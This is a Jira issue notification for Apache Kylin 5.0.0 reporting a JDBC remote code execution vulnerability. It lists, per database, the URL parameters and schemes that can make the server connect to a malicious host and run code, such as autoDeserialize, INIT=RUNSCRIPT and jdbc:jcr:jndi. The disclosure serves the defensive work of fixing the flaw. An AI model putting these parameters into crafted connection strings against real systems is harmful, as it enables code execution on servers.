Yinghao Lin created KYLIN-5994:
----------------------------------
Summary: JDBC remote code execution vulnerability
Key: KYLIN-5994
URL: https://issues.apache.org/jira/browse/KYLIN-5994
Project: Kylin
Issue Type: Bug
Components: RDBMS Source
Affects Versions: 5.0.0
Reporter: Yinghao Lin
Fix For: 5.0.1
>From Pho3n1x:
There is a vulnerability on adding jdbc data source with unchecked jdbc url
which may cause kylin server connect to a malicious remote server and get
unexpected result with code execution script invoked.
DBs and its' vulnerable url parameters are:
*derby*
- startMaster
- slaveHost
*mysql*
- autoDeserialize
- queryInterceptors
- statementInterceptors
- detectCustomCollations
*h2*
- INIT=RUNSCRIPT
*ibm db2*
- clientRerouteServerListJNDIName
*sqlite*
- resource:xxx
*bad JDBC scheme*
- jdbc:jcr:jndi
- jdbc:mysql:fabric
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
